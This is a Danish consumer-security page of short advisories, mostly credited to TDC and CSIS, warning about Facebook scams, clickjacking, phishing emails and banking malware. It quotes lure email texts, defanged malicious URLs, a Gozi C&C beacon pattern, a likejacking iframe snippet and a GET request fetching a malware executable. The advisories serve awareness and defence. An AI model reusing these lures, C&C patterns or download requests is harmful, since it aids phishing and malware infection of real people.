BESKYT PC’EN MOD TYVE

En ny tyverimærkning fra Danske IDtrack vil sikre, at dine værdier som fx din bærbare pc eller designerstol er helt uinteressant for tyve ud fra princippet, at hvis tyvene ikke kan afsætte deres tyvekoster, så stjæler de dem ikke i første omgang.

Tyverimærkningen, der skal monteres (limes) på den eller de genstande, du vil beskytte, advarer tyven om, at denne genstand er mærket, og at den kan fortælle, hvem dens rette ejermand er. Mærket har et nummer, der kan føres tilbage til IDtracks online database – vil du for eksempel købe noget brugt igennem den Blå Avis, vil du så kunne kontrollere, om sælger rent faktisk også er den egentlige ejer.

Systemet kan sættes på plast, glas, metal, træ og kunststof, og efter monteringen registrerer man sit unikke IDtrack-nummer på IDtracks hjemmeside. Mistes genstanden, kan en eventuel finder så se, hvem den rigtige ejermand er, med et klik på hjemmesiden samt indtastning af det unikke nummer.

Skifter genstanden ejer, kan ID’et rettes med medfølgende adgangskode.

LÆS MERE VED OG KLIK PÅ ONLINE SHOPPEN I VENSTRE SIDE - KLIK PÅ IKONET IDtrack. 

Du bør sikre din smartphone godt, hvis du både har mail, applikationer og den slags på den.

Du bestemmer selv hvor meget, du vil sikre din telefon alt efter hvilke oplysninger, du har på den. Men har du adgang til din arbejdsmail og andre følsomme oplysninger, bør du tænke dig godt om og sørge for, at du tager nogle forholdsregler omkring sikkerhed.

Telefonlås
Du bør sikre din telefon med en telefonlås med kodeord eller kodemønster, så andre ikke kan komme ind i telefonen.

I Android 1.5/1.6 er det et tegnemønster, mens det i 2.x serien er blevet til et kodeord. Det er en standard feature, som giver bedre beskyttelse end standard-tastaturlåsen.

Du skal tænke på de mange oplysninger, du kan give adgang til, hvis nogen får fingrene i din telefon.

Lokationsbaserede applikationer
Jeg ved, hvor dit hus bor! Det kan nemt blive virkelighed for en masse mennesker, hvis du bruger applikationer med GPS-funktion. For eksempel RunKeeper eller FourSquares der fortæller, hvor du er – eller hvilken løberute, du har taget.
Det kan nemt give uvedkommende adgang til viden om, hvor du bor og kæde det sammen med andre oplysninger om, hvornår du er hjemme, og hvor glad du er for dit nye fladskærms-tv.

Tænk over hvem, du deler oplysningerne med. Hold dem til en snæver kreds bestående af dig og de venner, som du kender i virkeligheden.
Tjek dine privacy settings, da en offentlig profil gør det meget nemt for andre at se, hvor du er.

Hold din telefon opdateret
Selve styresystemet og de enkelte programmer på telefonen skal holdes opdateret. Hackere benytter sikkerhedshuller i programmerne til at få adgang til din telefon.

Sørg for at hente opdateringerne til alle de applikationer og programmer, du har på din telefon. Især styresystemet er vigtigt at holde opdateret.

Brug fornuften – og din skepsis
Når du henter applikationer, giver du de forskellige programmer lov til at få adgang til en masse på din telefon.

For eksempel kræver den officielle Twitter-app adgang til nøjagtige positionsdata, fuld internet-adgang, mulighed for at læse og skrive kontaktinformation, administrationstilgang til brugerens Google-konti, mulighed for se andre applikationer som også køres og mulighed for at kontrollere vibratoren i mobilen.
Når det er den officielle app, sker der formentlig ikke noget ved det. Men i teorien kan Twitter hente alle kontaktinformationer i telefonen.

Du bør derfor vurdere hver enkelt app, du henter og læse, hvad andre har skrevet om den. Gør op med dig selv, hvad du vil tillade i de enkelte tilfælde.

Kilde TDC 

Vi siger ja tak til Facebook-spam

En ny undersøgelse fra it-sikkerhedsfirmaet F-Secure viser dog, at næsten 50 procent i nogle tilfælde også siger ja tak til spam via falske annoncer på Facebook. En it-sikkerhedsekspert vurderer, at antallet af falske spam-annoncer vil stige endnu mere, men vurderer dog, at færre vil lade sig lokke i fremtiden.

Danskerne er vilde med Facebook, og næsten alle danskere har i dag en Facebookprofil. En ny undersøgelse fra it-sikkerhedsfirmaet F-Secure, som har kigget nærmere på en række spam-kampagner på Facebook, viser, at så mange som 47 procent, der klikker sig ind på de falske annoncer, også siger ja-tak til spam ved at trykke på 'Like' knappen.
Dermed risikerer de at blive inficeret med vira. It-sikkerhedsekspert Michael Dahl, der er landeansvarlig for F-Secure Danmark, påpeger, at vi med Facebooks stadig stigende popularitet vil se endnu flere falske spam-kampagner. Men han vurderer dog samtidig, at effekten af disse vil være er faldende.

- Spam-angreb har fået en opblomstring med sociale medier som Facebook og Twitter, og vi ser flere og flere eksempler på opfindsomme måder at snyde folk på. De it-kriminelle ser det som en god forretning, og der er ingen tvivl om, at der kommer endnu flere af disse spam-angreb i fremtiden. Det gode er dog, at vi kan se af vores data, at effekten er faldende. Færre mennesker lader sig simpelthen lokke af disse falske spam-annoncer. Det skyldes i høj grad, at folk er blevet mere opmærksomme på, at problemet findes, og dermed bliver de også mindre tilbøjelige til at lade sig lokke,' siger Michael Dahl.

F-Secure har i undersøgelsen blandt andet set på to kampagner, som gav sig ud for at være en historie om McDonald’s 'Happy Meal Horror'. Kampagnerne brugte forkortede bit.ly links til at sprede sig.
F-Secure fandt ud af, at de to kampagner tilsammen havde haft omkring 32.000 kliks og cirka 15.000 'likes' på Facebook. Det svarer til, at cirka 47 procent af alle, som i første omgang klikkede sig ind på annoncen, også klikkede på 'Like' knappen for at læse mere og dermed ufrivilligt blev ofre for spam.

Sikkerheden i top
Michael Dahl peger på, at danskere generelt er i top, når det gælder it-sikkerhed, men han anbefaler alle at udvise forsigtighed over for tvivlsomme links på Facebook.
Det kan nemlig være spam, der i værste fald ender med at inficere din computer med vira.

Derfor er det ifølge Michael Dahl altid en god ide at have antivirus-programmer installeret for at afværge disse angreb. Han anbefaler dog at bruge lidt tid på at undersøge, hvilke funktioner de forskellige programmer indeholder, så man er sikret den bedst mulige beskyttelse, og at man løbende tager backup sine data og eventuelt får et program, som automatisk laver backup til nettet. Så kan man komme til sine data igen, hvis uheldet skulle være ude, og ens computer går ned på grund af virus.

Du kan læse mere om undersøgelsen og se eksempler på nogle af de kampagner, der har fået folk til at klikke og acceptere at få indbakken fyldt med spam.

http://www.f-secure.com/weblog/archives/00002015.html

 

Massevis af døde kendisser

Tro ikke de dårlige nyheder om døde kendte. Det er farlig lokkemad.

Sikkerhedsfirmaet CSIS har stoppet et stort antal spammails, som anvender døde kendisser som lokkemad.

Med spammailen er der vedhæftet en HTML-fil, der, når den åbnes, tvinger modtageren over på en side, der igennem browseren udnytter adskillige sårbarheder i forskellige programpakker, herunder populære tredjeparts produkter. Der lægges farlig kode på modtagerens maskine, uden at brugeren ved det.

De mange spammails ankommer med følgende letgenkendeligt indhold i emnelinjen:

Beyonce Knowles died
Bon Jovi died
Brad Pitt died
Cameron Diaz died
Alicia Keys died
Angelina Jolie died
David Beckham died
Gwen Stefani died
J.K. Rowling died
Jay-Z died
Jennifer Aniston died
Jennifer Lopez died
Johnny Depp died
Justin Timberlake died
Kanye West died
Madonna died
Miley Cyrus died
Nicole Kidman died
Oprah Winfrey died
Ronaldinho died
Tiger Woods died
Tom Cruise died

[%navn på kendis%] died along with 34 other people when the Air Force CT-43 "Bobcat" passenger plane carrying the group on a trip crashed into a mountainside while approaching the Dubrovnik airport in Croatia during heavy rain and poor visibility.

Please see attachment

Vedhæftet:
News.html

Den vedhæftede HTML fil er base64 kodet og lettere obfuskeret. Ved åbning afkodes scriptet i browseren og brugeren udsættes for følgende infektionskæde (mellemrum indlagt af CSIS):

http://pani plus.com.mx/1.html
--> cetog ilco.cz.cc / scanner10 / ?afid=24 (falsk AV produkt)
--> analytic spool.in/wiki/index.php?sid=151&search=ecard&refresh=on

Formålet er således at skræmme brugeren til at købe det falske antivirus produkt. Den sekundære payload er at tvangsfodre ikke opdaterede maskiner med en downloader i Bredolab klassen.

Kilde: CSIS Security Group
 

Inden længe vil vi også i Danmark begynde at fortælle Facebook hvor vi befinder os – det er den uundgåelige konsekvens af Facebooks introduktion af deres lokationsservice Facebook Places her i nat dansk tid. For virksomheders kommercielle interesse i Facebook rummer denne nye teknologi uanede muligheder, men hvad med for brugerne?

Hvad kan man med Facebook Places

Kort fortalt er Facebook Places muligheden for, at du via din mobiltelefon kan placere dig selv på et kort via telefonens GPS. Grunden til at det er så smart, at man gør det via telefonens Facebook applikation er, at du dermed samtidig fortæller dine Facebook-venner, hvor du befinder dig netop nu – og at du samtidig selv kan finde ud af om nogle af dine venner befinder sig samme sted som dig. Er du eksempelvis til koncert, vil det dermed være utroligt enkelt med nogle få klik at få at vide, om andre af dine venner befinder sig er i nærheden.

Er der ingen risici for brugerne?

Mens Facebook selvfølgelig fokuserer på alle de fordele og muligheder denne nye service fører med sig for deres brugere, skal man ikke være blind for, at en række nye problemstillinger, som mange mennesker i fremtiden vil komme til at skulle tage stilling til. Ingen er naturligvis interesserede i at lade alle venner vide, hvor man befinder sig hele tiden. Hertil skal det siges, at brugerne er 100 % i kontrol med, hvornår man selv vælger at ”tjekke ind” et sted. Du har også kontrol med om det skal være muligt for dine venner at tjekke dig ind sammen med dem, når I eksempelvis er i byen sammen.

Trods disse forholdsregler, bør man alligevel overveje de mulige konsekvenser af en sådan tilladelse, da man her kunne risikere at blive ”tagget” på en stripbar i Prag, hvor man nu ellers havde fortalt kæresten, at man tog dertil for en kulturel oplevelse. Eller man kan blive ”tagget” i byen, når man nu havde fortalt chefen, at man lå syg. Facebook har stillet teknologien til rådighed, og det er selvfølgelig helt op til brugerne at sætte sig ind i den før man tager den i brug for alvor, men det er nok uundgåeligt, at nogle brugere vil få ubehagelige oplevelser, mens vi vender os til dette nye værktøj.

En sikker succes?

Selve tanken om at lade brugere tjekke ind på fysiske steder via en webservice, og dermed dele deres daglige færd med vennerne er ikke helt ny. Tjenester som Foursquare og Gowalla har over det seneste år opnået brugertal på flere millioner. Men med introduktionen af Facebook Places er teknologien henover natten blevet tilgængelig for over 500 mio. mennesker, og hvad vigtigere er: Alle dine venner er der også allerede.

Stort potentiale for virksomheder

Facebook slår udelukkende på, at Places er en ny service til deres brugere. Men man kan sagtens argumentere for, at teknologien i lige så høj grad er udviklet som en indtjeningskilde for Facebook. Nu kan museer, restauranter og andre steder reklamere med, at dine venner besøger dem ofte. Eller du kan se hvor i nattelivet dine venner befinder sig lige nu, og om nogen har opdaget en happy hour et sted. Eller du kan tippe folk i nærheden om at H&M på Fisketorvet lige nu har et godt tilbud på skjorter.

Der vil uden tvivl dukke mange nye anvendelser af Facebook Places op, over de kommende måneder og år. Facebooks ambition med Places er tydeligvis at redefinere vores sociale adfærd på rekordtid, så en afgørende faktor for hvordan vi fremover bruger vores fritid, vil være hvem der befinder sig fysisk i nærheden af os. Og da tjenesten allerede fra fødslen har 500 mio. registrerede brugere, er chancerne for succes store.

Mere info fra Facebook (og illustrationer): http://blog.facebook.com/blog.php?post=418175202130 & http://www.facebook.com/places/ 

Ny farlig Facebook-lokkemad

Lad være med at klikke på Oh My God-beskeder på Facebook.

Facebook er atter mål for en såkaldt clickjacking kampagne.
Lokkemaden er beskeder, der postes på Facebook brugeres væg med indholdet (mellemrum indlagt af CSIS):

"OMG! Her boyfriend dies in her arms right before her eyes. The car hits
them while they kiss. It's heartbreaking. You must see this: http://bit.ly/d
ollLd.

URL-forkorter servicen "bit.ly" flytter brugeren videre til domænet:

http://apps.facebo ok.com/drivemortal/. Sikkerhedsfirmaet CSIS har anmodet om, at denne Facebook-side fjernes fra sitet. Facebook Security afdeling har bekræftet problemet og arbejder på en løsning.

Kilde: CSIS Security Group


 

Pas på med blindt at sige 'Synes godt om' på Facebook - nogle af dem vil du helt sikkert ikke synes om.

Med overskriften og lokkemaden "PROOF - G00G1E Knows Everything! No BS!" har mere end 10.000 Facebook brugere allerede klikket på "Synes godt om" knappen til en ny såkaldt "likejacking" kampagne.

Formålet med denne kampagne er at høste blandt andet mail-adresser og potentielt følsomme oplysninger fra vilkårlige og uforsigtige Facebook-brugere.

Kampagen lokker med, at Google ved mere om dig, end du aner. Men der er udelukkende tale om et fluepapir, der skal gøre den almindelige Facebook-bruger nysgerrig for at lokke denne til at klikke på tilkendegivelsen "Synes godt om" for derved at eksponere samme indhold for andre Facebook-brugere.

Sikkerhedsfirmaet CSIS anbefaler, at du holder dig væk fra denne kampagne. Har du (sammen med cirka 1000 andre danske brugere) allerede placeret en "Synes godt om" er det ikke for sent at fjerne den fra din væg, før den lokker andre i samme fælde.


Kilde :TDC 

Lad dig ikke narre af mail med informationer om din mailkonto. Det er naturligvis fup.

Sikkerhedsfirmaet CSIS har opsamlet et nyt spamrun, som forsøger at lokke vilkårlige modtagere til at åbne en vedhæftet zip fil.

Så pas på mailen med det følgende indhold:

Fra: [Spoofet / forfalsket afsender adresse]

Emnelinje: [%domæne navn på modtager%] account notification

Indhold:

Dear Customer,

This e-mail was send by [%domæne navn på modtager%] to notify you that we have temporanly prevented access to your account.

We have reasons to beleive that your account may have been accessed by someone else. Please run attached file and Follow instructions.

(C) [%domæne navn på modtager%]

Den vedhæftede zip fil opnår kun begrænset antivirus detektion og dropper, hvis zip-arkivet pakkes ud og køres, en Zbot/ZeuS informationstyv på maskinen.

Kilde: CSIS Security Group
 

Hvor mange har set din Facebook-profil?

Lad være med at falde for tricket, der lover dig, at du kan få svaret. Det er et net af farlige tricks.

I løbet af den forgangne uge har mange tusindende Facebook brugere postet en besked på deres væg, som skal lokke endnu flere til at prøve en applikation. Den lover, at du kan få at se, hvor mange der har været inde og kigge på din Facebook-profil. Men i virkeligheden er den et stort net af fup- og svindelnumre.

Beskeden lokker Facebook brugerens venner eller venner i en Facebookgruppe til at klikke på et link, der peger på en webside, som ikke hører hjemme hos Facebook.

Beskeden postes med indholdet (mellemrum indlagt af CSIS):

OMG OMG OMG... I can't believe this actually works! Now you really can see
who views your profile!!! WOAH --> http://profilespy.facebo oktricks.info/

Brugeren lokkes til en fjendtlig webside, som skal lokke til at godkende en applikation. Sker det, vil applikationen opnå adgang til brugerens profil ogderfra sprede sig til andre.

Går man hele linjen ud med denne applikation, svarer på alle de spørgsmål, der dukker op undervejs og giver informationer ud, kan man ende med at blive tilmeldt en temmelig dyr telefontjeneste.

Det er en god idé at tage sin kritiske sans med, når man klikker på den slags.

Kilde: CSIS Security Group
 

Deaktiveringsmail fra Facebook

De it-kriminelle holder ikke sommerferie fra Facebook. Pas på hvis du får at vide, at du har deaktiveret din konto.

CSIS har opsamlet en sværm af spammails, der foregiver at komme fra Facebook. Spammailen er sendt til vilkårlige modtagere med følgende indhold, som dog er HTML-formatteret:

Mailen har følgende indhold:


Emnelinjen:
You have deactivated your Facebook account

Indhold:

Hi,

You have deactivated your Facebook account. You can reactivate your account
at any time by logging into Facebook using your old login email and
password. You will be able to use the site like you used to.

Thanks,
The Facebook Team

To reactivate, follow the link below:

http://www.facebook.com/home.php ->

Da e-mailen er formatteret i HTML kan en almindelig bruger ikke umiddelbart se, hvor det medfølgende link peger hen. Med en underliggende HREF peges der i virkeligheden på domænet (mellemrum indlagt af CSIS):

http://outhouse publishing.net/granville.html
--> http://totalea ch.com

Landingszonen tilbyder forskellige former for falske medicinal produkter, og forretningen drives tydeligvis af Spamit/Glavmed banden, som opererer fra Rusland.

En sidebemærkning til denne forretning er, at der automatisk som del i tilbuddet, flyttes gratis generiske Viagra piller til indkøbskurven, der kombineret med andre medicinal produkter der tilbydes i et særlig blandingsforhold og mængde, kan være dødelig.

Kilde: CSIS Security Group
 

Sikkerheds klummen:
af Per Holst-Albrechtsen

Stifter af Spywarefri.dk
Medlem af Alliance of Security Analysis Professionals

Ligesom jeg, hører I det sikkert ofte: “Jeg kører med freeware-antivirus, så hvorfor skal jeg så betale for computersikkerhed”? Jeg hørte det igen forleden, og denne gang fra Peter, en af mine gode naboer.

Han fik selvfølgelig svaret med det samme: ”Når du kører bil ved du hvor vigtigt det er at sikkerheden er i orden. Sikkerhed er ikke kun gode bremser, men også gode dæk, et velfungerende rat, fejlfrie lygter samt mange andre ting.” Det kunne han kun give mig ret i, så jeg fortsatte:
”Det samme gælder sikkerheden på din computer. Du har et gratis antivirusprogram på engelsk, og du har tidligere fortalt mig, at engelsk ikke er din stærke side.” Igen måtte han give mig ret.

”Det vil sige at du har noget af den sikkerhed du bør have på din computer, men det du har, forstår du ikke godt nok til at du har været i stand til at konfiguere programmet, så det sikrer din computer bedst muligt. Der er mangler i alle gratis sikkerhedsprogrammer ”, forklarede jeg, og spurgte om han havde undersøgt hvad det han brugte mangler - det havde han ikke. Jeg kunne så forklare ham , hvilken mangel netop hans freeware-program havde. Det er selvfølgelig forskelligt, alt efter om det drejer sig om Avast, AVG, Avira, MSE eller Comodo og jeg vil i en senere klumme komme nærmere ind på de forskellige programmers mangler.

Ikke alene manglede Peters antivirus en vigtig funktion. Han manglede også en god firewall samt en del opdateringer af browser, styresystem samt flashplayer for at kunne kalde sig sikker.

Gratisprodukterne er ikke komplet sikkerhed. De er kun delvise produkter, de er ofte på engelsk og har væsentlige mangler. Comodo er en samlet gratis sikkerhedspakke, men så svag at jeg ikke på nogen måde ville betegne den som konkurrent til købe-sikkerhed. Ydermere er den så vanskelig at konfigurere, at der skal den store, udvidede ”fodermester-eksamen” til at klare den.

Jeg håber, at ovennævnte er gode argumenter for salget af gode samlede sikkerhedspakker, som f.eks. BullGuard.

Læs alt om de forskellige antivirus programmer ved at gå ind i vores online-shop 

- Fupmail lokker med personligt billede




Fupmail lokker med personligt billede

Sikkerhedsfirmaet CSIS har i nat stoppet et større spamrun, hvor lokkemaden er et billede som angiveligt skulle være vedhæftet som en html fil. Problemet er, at det er banditterne fra de seneste dages massive spamruns, som er tilbage med ny lokkemad. Den karakteristiske medfølgende HTML-fil indeholder fortsat et skjult javascript som ved åbning, tvinger brugeren videre til flere kompromitterede websider, og videre til en drive-by side, som udnytter flere exploits for til slut at lande på en typisk spamside, der reklamerer for medicinal produkter.

Mailen lyder således:

Emnelinje: Hi darling, my photo in attached file ;)

Indhold:
Open Your Eyes
You are
Only You

Vedhæftet:
photo.html

Den medfølgende html tvinger brugeren via et onfuskeret javascript til flere websider for dernæst at lande på en drive-by side, der misbruger sårbarheder i Adobe Reader/Acrobat og Java JRE. Den skadelige payload er et TDSS baseret rootkit, der forbinder den kompromitterede maskine til en central C&C (Command & Control) server. Antivirus detektion af henholdsvis javascript, exploitkode samt payload er under gennemsnit. Flere af de store Antivirus og IDS leverandører detekter ikke den skadelige kode.


Kilde: CSIS Security Group

 

- Advarsel mod raffineret netbanktyv


Sørg for at få opdateret alle dine programmer - der er en farlig netbanktyv på spil.

Sikkerhedsfirmaet CSIS ønsker hermed at advare både virksomheder og almindelige slutbrugere omkring en stigende trussel fra en raffineret netbanktyv, der tilhører familien "Gozi". Tyven betragtes som en betydelig trussel mod danske virksomheder og slutbrugere. TDC og sikkerhedsfirmaer har kategoriseret denne virus alert som "høj". Sikkerhedsfirmaet CSIS har ikke anvendt denne høje risikovurdering, siden der blev advaret mod malware familierne "Patcher" og "Conficker". Det er svært at være påpasselig mod denne trussel. Men hvis du sørger for, at alle programmerne på din pc er opdateret, og der således ikke er nogen sårbarheder, har hackerne svært ved at komme ind på din maskine.

Bekymrende meget trafik

CSIS ser netop nu en bekymrende mængde af trafik, der stammer fra inficerede maskiner, som forsøger at ringe hjem til en central Command & Control (C&C) server under banden Gozi's kontrol. Herfra kan de it-kriminelle udstede opdateringer til inficerede maskiner, ligesom de systematisk kan indsamle følsomme data og fjernkontrollere maskinerne. Gozi er en ny trussel på dansk jord. Denne familie af malware er særligt raffineret og udøver systematisk informationstyveri, ligesom Gozi er en trussel mod blandt andet netbanker.

Drive-by angreb

Det skadelige program installeres via klient side drive-by angreb, der aktivt udnytter sårbarheder i populære tredjepartsprodukter som for eksempel Adobe Acrobat/Reader, Adobe Flash, Quicktime og Java JRE. Drive-by er en betegnelse for download, der sker uden brugerens viden.
Som oftest bruges drive-by om den type angreb, hvor besøg på en legitim webside gør, at den besøgendes pc bliver inficeret uden, at brugeren opdager det. Flere af de it-kriminelle bander, der aktivt praktisk anvender denne form for angreb, bruger et såkaldt exploit kit, der hedder "Eleonore".
Antivirusdetektion er foruroligende lav, både hvad angår exploit kode og selve payloaden. Den bedste beskyttelse mod denne, samt tilsvarende trusler, er naturligvis at opdatere din pc, når der frigives nye sikkerhedsopdateringer. Det gælder således både Microsoft Windows og populære programpakker.
Giv din pc et gratis Health Check og få opdateret alle dine programmer.

En anden indsats vil være systematisk at blokere for de skadelige websider og i særdeleshed domæner, som inficerede maskiner ringer hjem til for at aflevere de følsomme data.

Store virksomheder inficeret

Den variant af Gozi der allerede har inficeret flere store danske virksomheder ringer hjem til en C&C server, som fysisk befinder sig hos Ecatel Network i Holland. Kommunikation, som indikerer en infektion på en klient vil ske til domænet (mellemrum indlagt af CSIS) "new porto.cn", der oversættes til IP adressen: 94.1 02.49.134. Et eksempel på en inficeret maskine, som via en HTTP reverse connect sender en forespørgsel til Gozi centrale C&C server, ses herunder: new porto.cn/cgi-bin/options.cgi?user_id[%unikt 10 cifret ID%] ID&version_id=[%BOT ID%]&passphrase=[%unikt password til C&C dropserver%%]&socks=[%TCP port nummer%]&version=[%socket version%]&crc=[%værdi%].

Kilde: CSIS Security Group


 

Pas på de gode tilbud på Facebook - det er ren bondefangeri.

Facebook er et socialt netværk, der blandt andet tilbyder almindelige mennesker at oprette profiler, grupper og skabe relationer mellem hinanden. Indlysende nok er det ikke udelukkende ærlige mennesker, som finder vej til Facebook.

Et par af sidste uges 'arbejd hjemmefra' fup grupper vinder stor popularitet, men faktum er, at der er tale om regulært bondefangeri.

Drop dit job og arbejd hjemmefra og scor kassen. Det lyder måske rosenrødt, men er alt andet end et tilbud, man skal tage imod.
Det er i særdeleshed gruppen 'Drop The Internet Stacks of Money And Quit Your Job', der lover en del mere, end de kan holde. Gruppen har allerede flere end 250.000 håbefulde medlemmer, som alle har det til fælles, at de tilbydes et såkaldt 'starter kit' til den nette sum af $1,97.
Desværre er tilbuddet ikke helt, hvad det giver sig ud for at være... Du ender nemlig med at betale betydeligt mere for noget informationsmateriale, som i bedste fald er helt og aldeles værdiløst.

CSIS har meldt den pågældende gruppe til Facebook, og håber de vælger at reagere på henvendelsen.
Indtil da skal du lade være med at tro, at der står en stor tønde for enden af regnbuen - eller på Facebook.

Kilde: CSIS Security Group
 

Pas på forskellige Facebook-beskeder, der vil have dig til at klikke dig videre til farlige sider.

Mange tusinde Facebook-brugere har i skrivende stund fået kompromitteret deres profil med en clickjacking orm, der automatisk spreder sig fra profil til profil ved opslå beskeder på venners væg.

Der anvendes forskellige emner, som skal lokke brugere til at klikke på beskeden, som for eksempel:

"LOL This girl gets OWNED after a POLICE OFFICER reads her STATUS MESSAGE."

"This man takes a picture of himself EVERYDAY for 8 YEARS!!"

"The Prom Dress That Got This Girl Suspended From School."

"This Girl Has An Interesting Way Of Eating A Banana, Check It Out!"

Ormen spreder sig ved at udnytte en dokumenteret, men tydeligvis usikker funktion i Facebook.

Det skadelige script ser ud som følgende (saniteret af CSIS):

name='fbf rame' scrolling='no' src='http://www.facebook.c om/plugins/li ke.php?href=http%3A%2F%2Fgirlownedby policelike.blogspot.com%2F'

Som platform for denne kampagne anvendes (mellemrum indlagt af CSIS):

http://girlowne dbypolicelike.blogspot.com/

http://www.thed atesafe.com/man/

http://manpictu reofhimselflike.blogspot.com/

I bunden af disse websider finder vi det føromtalte/dokumenterede script.

Metoden er således simpel: at lokke en uforsigtig bruger til at klikke på et link og en transparent IFRAME, hvilket resulterer i, at der kaldes et Facebook API, der gør hele processen anonym. Ikke særligt hensigtsmæssigt.

Ormen indeholder heldigvis ingen skadelig kode. Den spreder sig, og er således muligvis tænkt som en PoC (Proof of Concept) orm snarere end en reel trussel.

Kilde: CSIS Security Group
 

Blotter du dit privatliv på Facebook?

Facebook deler flere og flere af dine oplysninger. Giv din Facebook-profil et sikkerhedstjek.


Standardindstillingerne for dit privatliv på Facebook bliver hele tiden mere og mere vidtrækkende. Det viser infografikken 'The Evolution of Privacy on Facebook' med al tydelighed. Klikker du på grafikken, kan du se, hvordan standardindstillingerne ændrer sig fra 2005 til april 2010. Den blå farve viser, hvad der bliver delt med hvem. Seneste ændring betød for eksempel, at billeder og alt hvad der står på din væg - som standard bliver delt med hele nettet.

Se 'The Evolution of Privacy on Facebook'

Det kan naturligvis give nogle uheldige situationer. Derfor er det oplagt at give din Facebook-profil et eftersyn, så du ikke deler flere oplysinger, end du har lyst til.

Labyrint af indstillinger
Desværre er det blevet stadig mere kompleks at få styr på privatlivs sikkerhed på Facebook. New York Times har for nylig lavet en infografik, der viser de over 50 forskellige private indstillinger og hele 170 valgmuligheder på Facebook.

Se infografikken i New York Times

Siden viser også, hvordan den skrevne privatlivspolitik har udviklet sig de seneste år. Den bliver længere og længere - og er i dag på 5830 ord, hvilket gør den mere omfattende end den amerikanske forfatning.

Få styr på dine privatindstillinger
Men hvad skal du så gøre for at få styr på dine privatindstillinger på Facebook? Her kommer en kort vejledning.

1.Gå på facebook.com og log ind
2.Klik på Konto i øverste højre hjørne og klik så på Privatindstillinger
3.Gennemgå nu Profiloplysninger, Kontaktinformation, Applikationer og websites, Søg og Blokeringsliste. Under hvert punkt er der nye punkter, hvor du kan vælge, hvem der må se hvad.
Facebook har selv lavet en side, hvor de forklarer om indstillingerne. Læs Facebooks side om privatindstillinger

Lav et sikkerhedstjek
Når du har ændret indstillingerne, kan du bruge siden Privacy Check til at undersøge, hvor god din sikkerhed er på Facebook. Siden bliver anbefalet af sikkerhedsfirmaet F-secure.

1.Gå ind på siden Privacy Check
2.Klik på knappen Facebook Login og log ind.
3.Nu får du et overblik over, hvilke oplysninger du deler med omverdenen. Du får også en såkaldt privatlivs-score. Du kan maksimalt få en score på 21/21 og så er kassen grøn. Er kassen gul, skjuler du de fleste oplysinger. Er kassen rød, bør du overveje at skjule flere oplysninger.

KILDE: TDC

 

Koobface har her til morgen udsendt spammails til vilkårlige modtagere, hvor indholdet lokker med en video og et medfølgende link, som uforsigtigere brugere skal klikke på. Den uønskede mail anvender en URL-forkorter tjeneste og lander herefter på en velkendt webside med skadelig kode.

En URL-forkorter-tjeneste gør et meget langt link kort, og giver en forkortelse videre, så man ikke kan se hvilken hjemmeside, der ligger bag.

Den uønskede e-mail ankommer med følgende indhold (mellemrum indlagt af CSIS):

Emnelinje: Demo clip

Indhold:

Have You Seen This Movie?
http://x rl.in/5c33

Hvis det medfølgende link klikkes på, så flyttes brugeren videre til en webside med overskriften "Loading Video ...", som automatisk videredirigerer til følgende domæner: (mellemrum indlagt af CSIS)

http://melbajacqui.dre amstation.com
http://www.0cat ch.com
--> http://quick5-scan ner.com/?mid=328&code=3593b2&d=3&s=1&name=Loading%20video

Det sidste domæne simulerer en virusinfektion og vil i den forbindelse lokke brugeren til at installere et falsk antivirus-program.

Kilde: CSIS Security Group
 

Pas på mail, der lover dig 50 dollars til iTunes. Det er ikke musik, du får på din pc, hvis du åbner den vedhæftede fil.

Sikkerhedsfirmaet CSIS har her til morgen stoppet et spamrun, som foregiver at stamme fra Apple iTunes store og være et gavekort.

Det vil sige, at du kan risikere at modtage en mail, der tilsyneladende ikke er til dig, men indeholder dejlige 50 dollars, som du kan bruge løs af på Apples musikbutik iTunes.
Men det er det naturligvis ikke. Så slet mailen og lad være med at åbne den vedhæftede fil.

Den uønskede mail ankommer med følgende indhold:

Fra: [Spoofet / forfalsket]

Emnelinje: Thank you for buying iTunes Gift Certificate!

Indhold:

Hello!
You have received an iTunes Gift Certificate in the amount of $50.00

You can find your certificate code in attachment below.
Then you need to open iTunes. Once you verify your account, $50.00 will be credited to your account, so you can start buying music, games, video right away.

iTunes Store

Vedhæftet:
iTunes_certificate_247.exe --> iTunes_certificate_247.zip

Den skadelige zip fil er en Sasfis variant, som dropper kode på den inficerede maskine og samtidig forbinder sig til flere downloadservere, hvorfra den henter supplerende malware.

Ved kørsel droppes filen 'pgsb.lto' til windows systemmappen, som køres ved at udstede en rundll32.exe kommando, der peger på det skadelige bibliotek. Den injekter sig med det samme i hukommelsesrummet på processen 'svchost.exe'.

I næste fase forbinder den sig til domænerne (mellemrum indlagt af CSIS), hvor den trækker mere malware:

davidopolko.ru
scitox.com

Det sker eksempelvis med et GET request som illustreret herunder (mellemrum indlagt af CSIS)

GET sci tox.com/blog/wp-includes/js/codepress/languages/psihi.exe HTTP/1.1\r\n

Samtidig melder den sig ind i C&C serveren:
david opolko.ru/migel/bb.php?v=200&id=[%BOTID%]&b=6may&tm=11

Den skadelige downloader fanges af TDC's Sikkerhedspakke.

Kilde: CSIS Security Group
 

Pas godt kreditkortet - der svindles for tiden med optankning af taletid til mobilen.

Danskerne opfordres til at passe ekstra godt på deres kreditkortoplysninger, da TDC den seneste tid har konstateret svindel med optankning af taletid til mobilen.

- Svindlerne bliver mere og mere udspekulerede. Vi har ikke tidligere set det på denne måde, hvor almindelige danskere får afluret deres kreditkortoplysninger, som så bruges til at tanke taletid med hos TDC. Svindleren ringer derefter til dyre numre i udlandet, forklarer Anne-Mette Sommer, afdelingsdirektør i TDC.

Stribe af overførsler
Hvis man har været udsat for svindlen, vil man på sin bankkonto typisk se en hel stribe overførsler a 200 kr. til TDC.

- Det absolut bedste råd er at sikre sig, at ingen uvedkommende får adgang til ens kreditkortoplysninger. Hvis skaden er sket, og man kan se de unormale træk på sin bankkonto, skal man straks afvise betalingerne og melde det til politiet, understreger Anne-Mette Sommer.

Huserer i perioder
Svindlerne skifter løbende opkaldsnumre, så det er meget vanskelligt at sætte en stopper for de dyre udenlandske opkald for på den måde at begrænse den del af svindlen.

- Svindlerne huserer i perioder, og vi er desværre inde i sådan en periode lige nu, siger Anne-Mette Sommer.

Kilde TDC 

Spiller du spil på Facebook, skal du passe på, hvad du klikker på.

På Facebook kan man ikke alene holde kontakten med venner og bekendte. Man kan også fordrive tiden med spil som for eksempel 'Farm Town'. Den popularitet udnytter it-kriminelle til at sprede skadelig kode igennem Banner Injektion/Malvertizing.
